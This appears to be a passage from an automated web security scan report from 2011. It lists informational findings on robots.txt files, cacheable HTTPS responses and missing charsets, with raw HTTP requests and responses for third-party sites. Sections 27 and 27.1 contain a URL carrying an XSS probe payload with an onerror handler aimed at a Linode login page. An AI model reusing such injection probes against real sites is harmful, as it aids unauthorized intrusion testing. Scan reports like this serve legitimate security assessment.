Date: Tue, 19 Jul 2011 17:12:32 GMT
Connection: close
Content-Length: 86

User-Agent: *
Disallow: /css/
Disallow: /js/
Disallow: /WebResource.axd
Allow: /

26.63. http://wa.stubhub.com/b/ss/stubhub/1/H.22.1/s88119992504362 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wa.stubhub.com
Path:	/b/ss/stubhub/1/H.22.1/s88119992504362

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "190236-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www290
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.64. http://www.adminitrack.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adminitrack.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adminitrack.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 14:20:32 GMT
Content-Length: 493
Content-Type: text/plain
Last-Modified: Thu, 13 Aug 2009 14:32:10 GMT
Accept-Ranges: bytes
ETag: "c6e661d7221cca1:1955"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

# Created with RoboGen SE Trial
# http://www.rietta.com/robogen/
# --------------------------------
#AdminiTrack.com, Inc. -- http://www.adminitrack.com
# Robot Exclusion File -- robots.txt
# A
...[SNIP]...

26.65. http://www.atlassian.com/software/jira previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/software/jira

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atlassian.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:23 GMT
Accept-Ranges: bytes
ETag: W/"452-1259721205000"
Last-Modified: Wed, 02 Dec 2009 02:33:25 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 452
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /decorators
Disallow: /includes

# Disallow download page
Disallow: /software/download.jsp?
Disallow: /software/Download.jspa?

# Disallow individual pages
Disallow: /unsubscri
...[SNIP]...

26.66. http://www.axosoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.axosoft.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.axosoft.com

Response

HTTP/1.1 200 OK
Content-Length: 1638
Content-Type: text/plain
Content-Location: http://www.axosoft.com/robots.txt
Last-Modified: Mon, 23 May 2011 20:09:56 GMT
Accept-Ranges: bytes
ETag: "0c273628519cc1:1c3b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:25:13 GMT
Connection: close

# Our Google, which art in Mountain View,
# Hallowed be thy Domain Name.
# Thy Search Results Come.
# Thy Google Botting be Done,
# in Axosoft.com as it is in the GooglePlex.
# Give us this day our da
...[SNIP]...

26.67. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:48 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: alechill
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=8;expires=Wed, 22-Jun-2016 20:43:48 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

26.68. http://www.clickmanage.com/events/clickevent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clickmanage.com
Path:	/events/clickevent.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clickmanage.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 11 Apr 2006 16:50:58 GMT
Accept-Ranges: bytes
ETag: "085341b885dc61:758"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:23 GMT
Connection: close

User-agent: *
Disallow: /

26.69. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.63.15.33
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.70. http://www.factset.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.factset.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:26 GMT
Server: Apache
Last-Modified: Fri, 16 Nov 2007 21:43:07 GMT
ETag: "1427f-15c-43f12af2150c0"
Accept-Ranges: bytes
Content-Length: 348
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /files/webinars
Disallow: /files/product_sheets/wan
Disallow: /files/extras
Disallow: /cgi-bin
Disallow: /files/download
Disallow: /files/dsdownload
Disallow: /files/Vision_Dow
...[SNIP]...

26.71. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 19 Jul 2011 12:24:01 GMT
Expires: Tue, 19 Jul 2011 12:24:01 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

26.72. http://www.googleadservices.com/pagead/conversion/1052447870/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1052447870/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 12:24:02 GMT
Expires: Tue, 19 Jul 2011 12:24:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.73. http://www.ibegin.com/media/site/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ibegin.com
Path:	/media/site/images/logo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Jul 2011 00:00:13 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 08 Oct 2010 14:12:24 GMT
ETag: "1400db-166-4921b99814200"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /about/
Disallow: /blog/
Disallow: /weather/share
Disallow: /weather/xml
Disallow: /weather/removelocation.php
Disallow: /weather/setlocation.php
Disallow:
...[SNIP]...

26.74. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intelex.com

Response

HTTP/1.1 200 OK
Content-Length: 15931
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 18:06:37 GMT
Accept-Ranges: bytes
ETag: "1fe986ef79cb1:1710"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:43 GMT
Connection: close

...###############################
#
#
User-agent: *
#
# list folders robots are not allowed to index
#
Disallow: /old_images/
Disallow: /14001/
Disallow: /1_backup/
Disallow: /404notfound/
...[SNIP]...

26.75. http://www.linode.com/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linode.com
Path:	/index.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linode.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 14:30:59 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 16 Feb 2010 17:50:27 GMT
ETag: "2e3bd-86-47fbb5e723ec0"
Accept-Ranges: bytes
Content-Length: 134

User-agent: msnbot
Disallow: /forums/
Disallow: /support/doc/

User-agent: Googlebot
Disallow: /support/doc/
Disallow: /forums-test/

26.76. http://www.livedrive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livedrive.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 26 Jan 2010 15:36:13 GMT
Accept-Ranges: bytes
ETag: "e0d6b44a9d9eca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:15 GMT
Connection: close
Content-Length: 63

User-Agent: *
Disallow: /Scripts/
Disallow: /CustomErrors/

26.77. http://www.myspace.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Server: 2512620a57cd0d8af4e394cc1cb461b97e06c98e00ba7832
X-AspNet-Version: 4.0.30319
X-PoweredBy: Unicorns
Date: Tue, 19 Jul 2011 14:28:33 GMT
Connection: keep-alive
Content-Length: 660
X-Vertical: profileidentities

User-agent: *
Disallow: /my/*
Disallow: /about/*
Disallow: /signup/*
Disallow: /webim/*
Disallow: /search/*
Disallow: /AdSandbox.ashx
Disallow: /help/reportabuse?*
Disallow: /signout
Disallow
...[SNIP]...

26.78. http://www.netlogiq.ro/js/jquery.validate.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlogiq.ro
Path:	/js/jquery.validate.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netlogiq.ro

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 21 May 2009 09:10:26 GMT
Accept-Ranges: bytes
ETag: "ad66b5faf3d9c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:36 GMT
Connection: close
Content-Length: 86

User-Agent: *
Disallow: /css/
Disallow: /js/
Disallow: /WebResource.axd
Allow: /

26.79. http://www.numarasoftware.com/welcome/service_desk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.numarasoftware.com
Path:	/welcome/service_desk.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.numarasoftware.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 11 May 2011 01:34:45 GMT
Accept-Ranges: bytes
ETag: "80686e9b7bfcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:26 GMT
Connection: close
Content-Length: 755

User-agent: *
Disallow: /pics/
Disallow: /Connections/
Disallow: /eSubmission/
Disallow: /fp/
Disallow: /HTML_HDI_BC/
Disallow: /htmle/
Disallow: /includes/
Disallow: /javascript/
Disallow: /
...[SNIP]...

26.80. http://www.rallydev.com/js/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rallydev.com
Path:	/js/scriptaculous.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rallydev.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Nov 2010 18:23:32 GMT
ETag: "11e-4952fa7705100"
Accept-Ranges: bytes
Content-Length: 286
Cache-Control: max-age=300
Expires: Tue, 19 Jul 2011 14:25:39 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NON DSP COR CURa PSAa PSDa OUR NOR BUS PUR COM NAV STA"
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow:

Sitemap: http://www.rallydev.com/sitemap.xml
Sitemap: http://www.rallydev.com/rallydev-sitemap.xml
Sitemap: http://www.rallydev.com/video-sitemap.xml
Sitemap: http://www.rally
...[SNIP]...

26.81. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:c8e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 16:04:42 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /

26.82. http://www.seapine.com/ttpro.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seapine.com
Path:	/ttpro.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seapine.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Sep 2009 17:40:17 GMT
ETag: "2f0-75a30240"
Accept-Ranges: bytes
Content-Length: 752
Cache-Control: max-age=2592000
Expires: Thu, 18 Aug 2011 14:20:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

###############################
#
# Seapine's robots.txt file for www.seapine.com
#
# addresses all robots by using wild card *
#
User-agent: *
#
# list folders robots are not allowed to inde
...[SNIP]...

26.83. http://www.stubhub.com/content/getPromoContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/content/getPromoContent

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Apache
Set-Cookie: TLTHID=0269DA4EB23610B2E497C89D01B99543; Path=/; Domain=.stubhub.com
Last-Modified: Thu, 09 Jun 2011 06:36:28 GMT
Accept-Ranges: bytes
Content-Length: 11242
Keep-Alive: timeout=5, max=1474
Connection: close
Content-Type: text/plain

User-agent: Scoutjet
Disallow: *sitemap-*

User-agent: *
Disallow: /abilizer/
Disallow: /agents/
Disallow: /aggies/
Disallow: /aolcontest/
Disallow: /aollocal/
Disallow: /aolmusic/
Disallow: /aolsearc
...[SNIP]...

26.84. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:02 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Tue, 19 Jul 2011 14:28:27 GMT
Age: 0
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

26.85. http://www.techexcel.com/products/devsuite/devteststudio.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.techexcel.com
Path:	/products/devsuite/devteststudio.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techexcel.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/plain
Last-Modified: Mon, 11 Jul 2011 09:18:54 GMT
Accept-Ranges: bytes
ETag: "20b8fe8dab3fcc1:a7ae"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:30 GMT
Connection: close

User-Agent: *
Disallow: /txweb/
Disallow: /TechSupport/
Disallow: /techsupport/
Disallow: /email/
Disallow: /test/
Disallow: /devsuitehelp/
Disallow: /forum/
Disallow: /formwise/

26.86. http://www.ticketmaster.com/event/000043582C516D43 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/event/000043582C516D43

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Vary: Cookie
Last-Modified: Thu, 16 Jun 2011 21:30:37 GMT
ETag: "658-fadbb940"
Accept-Ranges: bytes
Content-Length: 1624
Content-Type: text/plain
Date: Tue, 19 Jul 2011 18:36:26 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...

27. Cacheable HTTPS response previous next
There are 5 instances of this issue:

https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E
https://manager.linode.com/session/forgot_save/N
https://oas.support.discoverbing.com/error.aspx
https://support.discoverbing.com/Default.aspx
https://support.microsoft.com/oas/default.aspx

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

27.1. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manager.linode.com
Path:	/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Request

GET /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:04:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2665

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...

27.2. https://manager.linode.com/session/forgot_save/N previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manager.linode.com
Path:	/session/forgot_save/N

Request

GET /session/forgot_save/N HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
Referer: https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2631

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...

27.3. https://oas.support.discoverbing.com/error.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://oas.support.discoverbing.com
Path:	/error.aspx

Request

GET /error.aspx?wfxerr=authmismatch HTTP/1.1
Host: oas.support.discoverbing.com
Connection: keep-alive
Referer: https://oas.support.discoverbing.com/default.aspx?ln=en-us&website=bing&tenant=oss&osubs=&brand=bing&c=oss_bing&as=1&st=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; AuthKey=oss_bing; WFXoss_bingToken=0; WFXLANG=en-us; WfxCookie=MSID=8fee6af6-b390-466e-93b5-9f1fca1be671; WFXSITE=gn; WFXTHEME=gn; WFXTOOLBAR=gn; WFXLANG=en-us

Response

HTTP/1.1 200 General Application Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:19:07 GMT
Content-Length: 1689

<script type="text/javascript">//<![CDATA[
document.domain='support.discoverbing.com';
if(top.suppressErrors) try{top.suppressErrors = false;}catch(e){}
//]]></script>
...[SNIP]...

27.4. https://support.discoverbing.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.discoverbing.com
Path:	/Default.aspx

Request

Response

27.5. https://support.microsoft.com/oas/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/oas/default.aspx

Request

Response

28. HTML does not specify charset previous next
There are 26 instances of this issue:

http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127
http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
http://asset0.zendesk.com/external/zenbox/v2.1/loading.html
http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01
http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01
http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01
http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96
http://corporate.everydayhealth.com/favicon.ico
http://creatives.as4x.tmcs.net/tmsandbox3a.html
http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css
http://majornelson.com/favicon.png
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://odb.outbrain.com/utils/ping.html
http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216
http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228
http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228
http://tm-web2.rondavu.com/com/rondavu/wt/module/static/rondavu_remote.html
http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
http://www.bnymellon.com/earnings.html
http://www.builtritecc.com/
http://www.gamestop.com/JavaScript/CertonaTable.htm
http://www.seapine.com/ttpro.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B5146585.127

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.as4x.tmcs.ticketmaster.com
Path:	/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

Request

GET /html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html HTTP/1.1
Host: ads.as4x.tmcs.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
